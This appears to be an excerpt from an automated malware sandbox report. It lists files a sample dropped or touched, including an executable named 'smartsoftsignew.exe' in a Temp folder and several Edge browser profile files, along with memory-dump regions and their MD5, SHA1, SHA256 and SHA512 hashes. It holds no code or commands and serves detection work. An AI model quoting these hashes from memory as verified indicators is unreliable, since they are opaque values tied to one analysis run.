SHA256 04d56d6aa727665802283b8adf9b873c1dd76dfc7265a12c0f627528ba706040
SHA512 b4a2b9f71b156731aa071d13bf8dcffec4091d8d2fab47aea1ff47cd7abff13e28acf1d9456a97eb7a5723dbfa166fc63de11c63dc5cb63b13b4df9930390377

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sgeibhzv.q1w.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3380-235-0x000001EDB3F90000-0x000001EDB3FB2000-memory.dmp

memory/4960-240-0x0000000000010000-0x00000000004C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000039001\smartsoftsignew.exe

MD5 66a5a529386533e25316942993772042
SHA1 053d0d7f4cb6e3952e849f02bbfbdb4d39021146
SHA256 713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94
SHA512 9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

memory/4312-268-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/3116-269-0x0000000004B80000-0x0000000004BB6000-memory.dmp

memory/3116-270-0x00000000051F0000-0x000000000581A000-memory.dmp

memory/3116-271-0x0000000005150000-0x0000000005172000-memory.dmp

memory/3116-273-0x0000000005AC0000-0x0000000005B26000-memory.dmp

memory/3116-272-0x0000000005950000-0x00000000059B6000-memory.dmp

memory/3116-282-0x0000000005B30000-0x0000000005E87000-memory.dmp

memory/3116-283-0x0000000005FE0000-0x0000000005FFE000-memory.dmp

memory/3116-284-0x0000000006020000-0x000000000606C000-memory.dmp

memory/4960-286-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/4312-288-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/3116-289-0x0000000007710000-0x0000000007D8A000-memory.dmp

memory/3116-290-0x0000000006510000-0x000000000652A000-memory.dmp

memory/944-291-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/944-292-0x0000000000010000-0x00000000004C5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7915c5c12c884cc2fa03af40f3d2e49d
SHA1 d48085f85761cde9c287b0b70a918c7ce8008629
SHA256 e79d4b86d8cabd981d719da7f55e0540831df7fa0f8df5b19c0671137406c3da
SHA512 4c71eb6836546d4cfdb39cd84b6c44687b2c2dee31e2e658d12f809225cbd495f20ce69030bff1d80468605a3523d23b6dea166975cedae25b02a75479c3f217

memory/4948-314-0x00007FF7D4210000-0x00007FF7D4CE5000-memory.dmp

memory/2464-313-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4048-312-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/4204-315-0x00007FF7449B0000-0x00007FF745BE5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9faad3e004614b187287bed750e56acc
SHA1 eeea3627a208df5a8cf627b0d39561167d272ac5
SHA256 64a60300c46447926ce44b48ce179d01eff3dba906b83b17e48db0c738ca38a9
SHA512 a7470fe359229c2932aa39417e1cd0dc47f351963cbb39f4026f3a2954e05e3238f3605e13c870c9fe24ae56a0d07e1a6943df0e891bdcd46fd9ae4b7a48ab90

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 39f220db2cd47448bb928dc1fc0af0e5
SHA1 440f55595985ae354b45e41710ca898221102b31
SHA256 8f71415a2bc1b9ee36e32b7be1ecac7f563516d3be442444105789d427c17983
SHA512 6554407535586e0d3d4d190e7bdd5d6ac674d3ae8caff9772b9fa188985ba87c1e87ea464e4efe458335a1d247525455d9165b82e6658ea01e23186df02d4b06

memory/4204-353-0x00007FF7449B0000-0x00007FF745BE5000-memory.dmp

memory/4948-357-0x00007FF7D4210000-0x00007FF7D4CE5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/4048-385-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-386-0x0000000000010000-0x00000000004C5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 50eab64a92fd1d686cd628d555d5ffbe
SHA1 38dfbcc9d3350def97a9a750cccdc74cc3bef5e7
SHA256 7105c0bbbb4713d895dd93bef16f3ca74b233290747b13d292926115a47a4b67
SHA512 3e773c3e78f8d57c1e9f05867103c686db94582aa16577521cab5677e0a0b6f061edfa7371de079ddd093126be4fb571b1b143be00a6a5d0584a168839db7123

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 29da9e1db4242ed1f7f1f900a4dbe5f0
SHA1 b5d8e212da48ab39e78d12d801ca0dd8c167b7b7
SHA256 3838e8a5c5d29f2e26c2bce3efcb545002c003a1c4db3f97469ccf5c31253a0d
SHA512 20a72050437cf9c01fb87a58456ec129e0aadb3e6af2405a4b9dbaf33f4befa008776ad955432a6ceaf7d91f3c4004aa59d09aa1a4758e7751ca4de1b3328acb

memory/2464-401-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4048-404-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-405-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2464-406-0x00000000001C0000-0x00000000007A3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 e3e96c495675106caf9c71dc25fb03f3
SHA1 443b7c2a5d11f00ae4d62799609c9cad1b839f03
SHA256 8306e6f7f97e7cfce3f9977a1453902083351859b5dfd669a03b5bd0a1a0716d
SHA512 35b6ab74f3ae2e263d414714f92b72ba9feb2c07394f1e8af2bc0efc762f4d9ba9314672e63001cefecea3eb2a9b8f094fafcc8fb178e5ae76e4c95647ac623e

memory/4048-421-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-422-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2464-423-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/944-424-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/4048-425-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/2464-426-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/944-427-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/4048-428-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/2464-429-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4948-439-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2336-440-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/4948-441-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2336-442-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/4048-443-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-444-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2464-446-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/944-452-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/4048-453-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/2464-454-0x00000000001C0000-0x00000000007A3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 bc8019effc2fc8b614299e0ecc1fb919
SHA1 d43f847c70cf80c9154ca7488ce31e45d0f79b22
SHA256 11061dee3b09be59e592f4cf31a78958be66ce637b8bdc387424ccd7dc84ccb4
SHA512 64d75d09071ef75cd6c770b845dd034ed0794ab68618b2f6c3df6abcf5706121bfbdb752806301c90e6fd3f3d3f0dafb615f354ff19c5741007bb2bbf8fa0452

memory/944-478-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/4048-479-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/2464-480-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4048-481-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-482-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2464-483-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4048-484-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-485-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2464-486-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4048-487-0x0000000000E20000-0x00000000012CF000-memory.dmp

memory/944-488-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/2464-489-0x00000000001C0000-0x00000000007A3000-memory.dmp

memory/4960-490-0x0000000000010000-0x00000000004C5000-memory.dmp

memory/4564-491-0x0000000000E20000-0x00000000012CF000-memory.dmp